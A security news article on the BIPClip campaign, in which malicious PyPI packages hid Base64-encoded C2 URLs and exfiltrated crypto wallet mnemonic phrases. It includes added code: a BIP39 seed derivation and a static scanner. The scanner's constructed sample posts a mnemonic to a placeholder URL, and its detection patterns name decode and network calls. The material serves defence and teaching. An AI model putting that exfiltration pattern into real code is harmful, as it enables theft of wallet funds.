
Malicious Python Packages Target Crypto Wallet Recovery Passwords

A newly discovered campaign pushing malicious open source software packages is designed to steal mnemonic phrases used to recover lost or destroyed crypto wallets, according to a report by ReversingLabs. *

The campaign, dubbed BIPClip, was uncovered in early March and targets developers working on crypto-related projects. In all, seven open source packages with links to the campaign were identified, encompassing 19 different file versions. The packages target developers implementing Bitcoin Improvement Proposal 39 (BIP39), which specifies a list of easy-to-remember words that are used to generate the binary seed from which deterministic Bitcoin wallets are created, according to a blog post by ReversingLabs researcher Karlo Zanki.
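The derivation BIP39 specifies, shown as an added example that uses only the Python standard library (it is not code from any of the packages discussed). The mnemonic and the passphrase "TREZOR" are the first BIP39 reference vector; the seed-to-master-key step is the BIP32 HMAC-SHA512 construction. Full mnemonic validation (every word in the 2048-word list plus checksum) needs the wordlist, which is deliberately not embedded here.

```python
"""BIP39 mnemonic -> binary seed -> BIP32 master key, standard library only.
Added example illustrating the derivation the article describes; it is not
code from any of the packages discussed."""
import hashlib
import hmac
import unicodedata
from typing import Tuple

VALID_WORD_COUNTS = (12, 15, 18, 21, 24)   # 128..256 bits of entropy plus checksum


def has_valid_word_count(mnemonic: str) -> bool:
    """Cheap structural check only. Verifying that every word is in the
    2048-word list and that the checksum matches needs the wordlist,
    which is not embedded in this example."""
    return len(mnemonic.split()) in VALID_WORD_COUNTS


def bip39_seed(mnemonic: str, passphrase: str = "") -> bytes:
    """BIP39: NFKD-normalise both strings, then PBKDF2-HMAC-SHA512 with the
    mnemonic as the password, "mnemonic" + passphrase as the salt,
    2048 rounds, 64 bytes of output."""
    if not has_valid_word_count(mnemonic):
        raise ValueError("mnemonic must have 12, 15, 18, 21 or 24 words")
    password = unicodedata.normalize("NFKD", mnemonic).encode("utf-8")
    salt = ("mnemonic" + unicodedata.normalize("NFKD", passphrase)).encode("utf-8")
    return hashlib.pbkdf2_hmac("sha512", password, salt, 2048, dklen=64)


def bip32_master_key(seed: bytes) -> Tuple[bytes, bytes]:
    """BIP32: HMAC-SHA512 keyed with b"Bitcoin seed" over the seed. The left
    32 bytes are the master private key, the right 32 the chain code. Every
    key and address in the wallet descends from these two values, which is
    why the mnemonic alone is worth exfiltrating."""
    digest = hmac.new(b"Bitcoin seed", seed, hashlib.sha512).digest()
    return digest[:32], digest[32:]


if __name__ == "__main__":
    # BIP39 reference vector: all-zero entropy, passphrase "TREZOR"
    words = "abandon " * 11 + "about"
    seed = bip39_seed(words, "TREZOR")
    print("seed      :", seed.hex())
    key, chain = bip32_master_key(seed)
    print("master key:", key.hex())
    print("chain code:", chain.hex())
```

The optional passphrase is the only thing standing between a leaked mnemonic and the wallet: an empty passphrase and a non-empty one produce unrelated seeds, so a mnemonic stolen without its passphrase is less useful to an attacker, but most users set none.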

Malicious Open Source Dependencies At Work

The campaign first came to light after one of the packages, bip39_mnemonic_decrypt, turned up in a scan of the Python Package Index (PyPI) by ReversingLabs' Spectra Assure software supply chain security platform. The package had several suspicious characteristics, including code that performed Base64 decoding and a dependency on requests, the common open source library used for network communication in the Python ecosystem.

Further investigation revealed that bip39_mnemonic_decrypt was a dependency of a second package, mnemonic_to_address, which could be used to create a seed from the user's secret mnemonic phrase and which itself contained no malicious code. Both packages were published in early February by james_pycode, a throwaway PyPI maintainer account created on the same day the packages were published.

The james_pycode maintainer account was created on the same day (February 4) that the malicious Python packages were posted.

At the heart of the campaign is a malicious function, decrypt_jsBIP39, found at the very end of the __init__.py file in the bip39_mnemonic_decrypt package. It is listed after several non-malicious functions that are never actually used in the code base, an apparent effort to throw off developers or security teams hunting for red flags in the library.
When run, the function decodes the Base64-encoded URL of the data exfiltration server and invokes another function named cli_keccak256. That function is also malicious; its name merely evokes keccak256, a legitimate cryptographic hash function commonly used to compute Ethereum addresses, transaction IDs and other values in the Ethereum ecosystem, so that it reads like ordinary wallet code to anyone skimming the file.

The decrypt_jsBIP39 function enables exfiltration of the BIP39 mnemonic phrases. (Image courtesy of ReversingLabs)

More Packages, More Malicious Dependencies

More digging by Zanki and ReversingLabs turned up another malicious package pair with nearly identical code: public-address-generator and erc20-scanner, also published from a throwaway PyPI account, on March 1. This second pair appears to work together in the same way as mnemonic_to_address and bip39_mnemonic_decrypt, with malicious functionality identical to that in bip39_mnemonic_decrypt implemented in the erc20-scanner package. The second pair also uses the same command and control (C2) server to exfiltrate stolen mnemonics as the first, reinforcing the connection.

Hashdecrypt(s): evidence of an older campaign

Finally, Zanki and ReversingLabs uncovered another malicious package, hashdecrypts, which uses slightly different methods to exfiltrate mnemonic phrases than the other BIPClip packages and points to a much longer-running campaign targeting mnemonic recovery phrases.

The hashdecrypts package was published on March 1 by the PyPI user account luislindao. Unlike the other packages, however, this was not a new, throwaway account: luislindao was first registered on PyPI in August 2019. The code in hashdecrypts was nevertheless almost identical to the malicious code in bip39_mnemonic_decrypt and erc20-scanner, suggesting a connection to the BIPClip campaign.

When run, hashdecrypts makes an HTTP GET request to a Base64-encoded URL, from which it retrieves the address of the C2 server, and then sends the stolen data to that address with an HTTP POST request. Staging the C2 address in a location the package fetches at run time lets the operator change the exfiltration endpoint without publishing a new package version. A comment header in the hashdecrypts code points to a GitHub repository belonging to the HashSnake GitHub user account. When Zanki looked at the commit history of that repository, he found a related package, hashdecrypt (note: no trailing "s"), first published on December 4, 2022. All three published versions of that package contained the same malicious functionality and fetched the same C2 server address from the same GitHub repository.
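The traits described for decrypt_jsBIP39 and for hashdecrypts (a Base64 string literal that decodes to a URL, a requests call that sends data out, and decoy functions nothing references) are easy to triage statically. The scanner below is an added example, not ReversingLabs' tooling or code from the packages; it walks a module's AST and reports those three signals. The two modules it scans are constructed for the example, and the URL in them is a placeholder under the reserved .invalid TLD, not a real C2 address.

```python
"""Static triage for the BIPClip-style pattern in one Python module:
Base64 literals that decode to http(s) URLs, Base64 decode calls,
outbound network calls, and functions that are defined but never referenced.
Added example; not ReversingLabs' tooling. Sample modules are constructed."""
import ast
import base64
import binascii
import re
from typing import Optional

URL_RE = re.compile(r"^https?://\S+$", re.IGNORECASE)
NETWORK_CALLS = {"requests.get", "requests.post", "urllib.request.urlopen"}
DECODE_CALLS = {"base64.b64decode", "base64.urlsafe_b64decode"}


def decoded_url(literal: str) -> Optional[str]:
    """Return the plaintext if `literal` is strict Base64 that decodes to a URL."""
    try:
        text = base64.b64decode(literal, validate=True).decode("ascii")
    except (binascii.Error, ValueError):   # bad alphabet, padding, or non-ASCII
        return None
    return text if URL_RE.match(text) else None


def dotted_name(node: ast.AST) -> Optional[str]:
    """Render an ast.Name / ast.Attribute chain as 'pkg.mod.attr'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(node.id)
    return ".".join(reversed(parts))


def scan_source(source: str) -> dict:
    """Collect the signals and flag the module when a decoded URL literal
    and an outbound network call both occur (line numbers are kept for review)."""
    tree = ast.parse(source)
    report = {"base64_urls": [], "decode_calls": [], "network_calls": [],
              "unreferenced_functions": [], "suspicious": False}
    defined, referenced = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str) and len(node.value) >= 16:
            url = decoded_url(node.value)
            if url:
                report["base64_urls"].append((node.lineno, url))
        elif isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in DECODE_CALLS:
                report["decode_calls"].append((node.lineno, name))
            if name in NETWORK_CALLS:
                report["network_calls"].append((node.lineno, name))
        elif isinstance(node, ast.FunctionDef):
            defined.add(node.name)
        if isinstance(node, ast.Name) and isinstance(node.ctx, ast.Load):
            referenced.add(node.id)
        elif isinstance(node, ast.Attribute):
            referenced.add(node.attr)
    report["unreferenced_functions"] = sorted(defined - referenced)
    report["suspicious"] = bool(report["base64_urls"] and report["network_calls"])
    return report


# Constructed sample mimicking the described layout: decoys first, the one
# network-touching function last, C2 URL hidden as Base64. Placeholder URL only.
PLACEHOLDER_URL = "https://collector.example.invalid/api"
SAMPLE_MODULE = '''
import base64
import requests

def word_count(phrase):          # decoy: defined, never referenced
    return len(phrase.split())

def normalize(phrase):           # decoy: defined, never referenced
    return " ".join(phrase.lower().split())

def decrypt_phrase(mnemonic):    # the only function that touches the network
    target = base64.b64decode("%s").decode()
    requests.post(target, json={"m": mnemonic}, timeout=5)
    return mnemonic
''' % base64.b64encode(PLACEHOLDER_URL.encode()).decode()

# Constructed benign module: derives a seed locally, no decoding, no network.
BENIGN_MODULE = '''
import hashlib

def seed(mnemonic, passphrase=""):
    return hashlib.pbkdf2_hmac("sha512", mnemonic.encode(), ("mnemonic" + passphrase).encode(), 2048)
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_MODULE), ("benign", BENIGN_MODULE)):
        print(label, scan_source(src))
```

Run this over every .py file in a freshly downloaded sdist or wheel (pip download, then unpack) before the package is installed, since setup.py and __init__.py run code at install or import time. The URL check is deliberately strict: Base64 that decodes to a URL inside a package that also makes HTTP requests is a reviewable finding on its own, whereas either signal alone is common in legitimate code.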

Uptake of the newly posted malicious PyPI packages was small: 997 downloads of public-address-generator, 341 of erc20-scanner and 224 of hashdecrypts, which suggests the campaign had limited reach.

That is less true of the older hashdecrypt package, for which ReversingLabs counted 4,295 downloads dating back to December 2022.

Crypto in the crosshairs (again)

The BIPClip campaign underscores the continued targeting of cryptocurrency related applications and code by malicious actors, according to ReversingLabs. Both cyber criminal and nation state hacking groups have taken an interest in exploiting cryptocurrency software and infrastructure, with the goal of stealing the content of cryptocurrency wallets.

Recent campaigns range from the compromise of the open source Ledger Connect Kit, which resulted in the redirection of crypto transactions, to the publication of malicious npm packages related to cryptocurrency applications and platforms. Nation state actors affiliated with the Democratic People's Republic of Korea (DPRK), for example, are believed to have stolen as much as $3 billion in cryptocurrency in the past five years. Stolen cryptocurrency now accounts for as much as 5% of North Korea's GDP.

That context puts an additional burden on developers working on crypto-related projects to assess the security of the open source and commercial code used in their development pipelines, and to assess the security of software artifacts before, during and after the development and build process, ReversingLabs said.


(*) Editor’s note: In addition to my work as Editor in Chief at The Security Ledger, I am a salaried employee at ReversingLabs where I have served as the Cyber Content Lead since November 2021.
